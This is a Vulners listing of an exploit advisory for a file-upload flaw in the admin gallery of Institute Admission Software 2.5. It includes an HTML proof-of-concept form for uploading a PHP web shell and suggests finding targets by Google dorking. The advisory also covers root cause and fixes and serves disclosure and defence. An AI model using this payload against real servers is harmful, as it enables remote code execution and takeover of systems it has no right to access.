Vulners
Lucene search
📄 Institute Admission Software 2.5 Shell Upload
=============================================================================================================================================
| # Title : Institute Admission Software 2.5 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits) |
| # Vendor : https://softmaart.com/institute-admission-software.php |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] summary : This vulnerability affects Institute Admission Software v2.5, where the application fails to properly validate and restrict uploaded files in the gallery upload functionality within the admin panel.
An attacker can exploit this weakness by directly submitting a crafted multipart/form-data POST request to the vulnerable endpoint, allowing the upload of arbitrary executable files instead of legitimate images.
Due to the absence of strict server-side file type validation, content inspection, and execution controls,
a malicious file (e.g. PHP web shell or executable payload) can be successfully uploaded to the publicly accessible /uploads/ directory.
Once uploaded, the attacker may directly access the file via the browser, potentially leading to Remote Code Execution (RCE) on the target server.
[+] Impact includes:
Arbitrary file upload
Remote command execution
Full web application compromise
Possible server takeover depending on permissions
[+] Root Cause:
Missing MIME-type and extension validation
No server-side file execution restrictions
Insecure upload directory exposure
[+] Severity: High
Attack Vector: Remote / Unauthenticated (depending on admin access exposure)
This issue highlights a critical failure in secure file handling practices and emphasizes the necessity of enforcing strict upload validation, randomized file naming, execution blocking, and proper access controls.
[+] The following html code uploads a executable malicious file remotely .
[+] Save code As : poc.html
[+] Line 01 set your Target
[+] Link to the uploaded files :/uoploads/
[+] use payload :
<form action="http://127.0.0.1/gpgcgairsain.ac.in/admin_panel/gallery.php?id=19" method="POST" enctype="multipart/form-data">
<label for="event">Event:</label>
<select name="event" id="event">
<option value="19">Hindi Departmental Programme</option>
<!-- يمكنك إضافة خيارات الأحداث هنا -->
</select>
<br><br>
<label for="photo">Photo:</label>
<input type="file" name="photo" id="photo" accept="image/*">
<br><br>
<input type="hidden" name="db_photo" value="">
<input type="submit" name="submit" value="Upload">
</form>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Dec 2025 00:00Current
7.1High risk
Vulners AI Score7.1